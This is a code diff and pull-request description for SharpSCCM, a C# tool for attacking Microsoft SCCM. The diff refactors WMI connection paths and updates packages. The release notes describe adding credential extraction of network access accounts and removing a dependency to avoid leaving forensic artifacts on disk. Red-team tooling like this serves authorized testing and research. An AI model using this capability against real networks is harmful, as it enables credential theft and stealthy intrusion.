+        public static ManagementScope NewWmiConnection(string server = null, string wmiNamespace = null, string siteCode = null)
         {
             string path = "";
             ConnectionOptions connection = new ConnectionOptions();
@@ -142,14 +142,14 @@ namespace SharpSCCM
             {
                 path = $"\\\\{server}\\{wmiNamespace}";
             }
-            else if (!string.IsNullOrEmpty(server) && !string.IsNullOrEmpty(sitecode))
+            else if (!string.IsNullOrEmpty(server) && !string.IsNullOrEmpty(siteCode))
             {
-                path = $"\\\\{server}\\root\\SMS\\site_{sitecode}";
+                path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
             }
             else
             {
-                (server, sitecode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
-                path = $"\\\\{server}\\root\\SMS\\site_{sitecode}";
+                (server, siteCode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
+                path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
             }
             ManagementScope wmiConnection = new ManagementScope(path, connection);
             try

--- a/lib/MgmtUtil.cs
+++ b/lib/MgmtUtil.cs
@@ -138,18 +138,29 @@ namespace SharpSCCM
                 }
                 path = $"\\\\{server}\\{wmiNamespace}";
             }
-            else if (!string.IsNullOrEmpty(wmiNamespace))
-            {
-                path = $"\\\\{server}\\{wmiNamespace}";
-            }
             else if (!string.IsNullOrEmpty(server) && !string.IsNullOrEmpty(siteCode))
             {
-                path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
+                if (string.IsNullOrEmpty(wmiNamespace))
+                {
+                    path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
+                }
+                else
+                {
+                    path = $"\\\\{server}\\{wmiNamespace}";
+                }
             }
             else
             {
                 (server, siteCode) = ClientWmi.GetCurrentManagementPointAndSiteCode();
-                path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
+                if (string.IsNullOrEmpty(wmiNamespace))
+                {
+                    path = $"\\\\{server}\\root\\SMS\\site_{siteCode}";
+                }
+                else
+                {
+                    path = $"\\\\{server}\\{wmiNamespace}";
+                }
+                
             }
             ManagementScope wmiConnection = new ManagementScope(path, connection);
             try

--- a/packages.config
+++ b/packages.config
@@ -1,12 +1,16 @@
 ﻿<?xml version="1.0" encoding="utf-8"?>
 <packages>
   <package id="ILMerge" version="3.0.41" targetFramework="net472" />
+  <package id="Microsoft.Bcl.AsyncInterfaces" version="1.1.0" targetFramework="net472" />
   <package id="Microsoft.CSharp" version="4.4.1" targetFramework="net461" />
   <package id="System.Buffers" version="4.5.1" targetFramework="net461" />
   <package id="System.CommandLine" version="2.0.0-beta3.22114.1" targetFramework="net472" />
   <package id="System.CommandLine.NamingConventionBinder" version="2.0.0-beta3.22114.1" targetFramework="net472" />
   <package id="System.Memory" version="4.5.4" targetFramework="net461" />
   <package id="System.Numerics.Vectors" version="4.5.0" targetFramework="net461" />
-  <package id="System.Runtime.CompilerServices.Unsafe" version="4.5.3" targetFramework="net461" />
-  <package id="System.ValueTuple" version="4.3.0" targetFramework="net461" />
+  <package id="System.Runtime.CompilerServices.Unsafe" version="4.7.1" targetFramework="net472" />
+  <package id="System.Text.Encodings.Web" version="4.7.1" targetFramework="net472" />
+  <package id="System.Text.Json" version="4.7.2" targetFramework="net472" />
+  <package id="System.Threading.Tasks.Extensions" version="4.5.4" targetFramework="net472" />
+  <package id="System.ValueTuple" version="4.5.0" targetFramework="net472" />
 </packages>


### PR DESCRIPTION
### Release Notes
- Ported Adam Chester's (@_xpn_) research (https://blog.xpnsec.com/unobfuscating-network-access-accounts/) on pulling network access accounts from SCCM management points
- Removed required server and sitecode arguments. SharpSCCM now uses the local client's current management point and sitecode.
- Added some unit testing that I need to finish.
- Added --debug option instead of always dumping full stack trace on errors. Also supports debugging of Client Messaging SDK functions.
- Removed use of dotnet-suggest to prevent registration artifacts from dropping to disk on execution.
- General reorganization, bug fixes, and code cleanup.

### Type of change

- [X] Bug fix (non-breaking change which fixes an issue)
- [X] New feature (non-breaking change which adds functionality)
- [X] Breaking change (fix or feature that would cause existing functionality to not work as expected)
  - Hardcoded SharpSCCM commands that use the previously required server and sitecode arguments will fail. 
- [X] This change requires a documentation update

### Testing

Manually tested all subcommands.

### Checklist:
- [X] My code follows the style guidelines of this project
- [X] I have performed a self-review of my own code
- [X] I have commented my code, particularly in hard-to-understand areas
- [X] I have made corresponding changes to the documentation
- [X] My changes generate no new warnings
- [] I have added tests that prove my fix is effective or that my feature works
- [X] New and existing unit tests pass locally with my changes
- [X] Any dependent changes have been merged and published in downstream modules
